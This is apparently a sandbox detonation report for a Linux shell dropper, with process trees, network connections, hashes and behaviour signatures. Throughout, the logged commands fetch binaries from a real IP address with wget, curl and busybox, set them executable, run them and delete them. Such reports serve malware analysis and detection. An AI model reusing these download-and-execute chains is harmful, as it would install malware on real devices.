[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 03:24
Reported
2024-10-28 03:27
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
11s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
Processes
/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh
[/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| US | 151.101.193.91:443 | | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 89.187.167.3:443 | | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.61:443 | | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.62:443 | | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 03:24
Reported
2024-10-28 03:27
Platform
debian9-armhf-20240611-en
Max time kernel
4s
Max time network
5s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
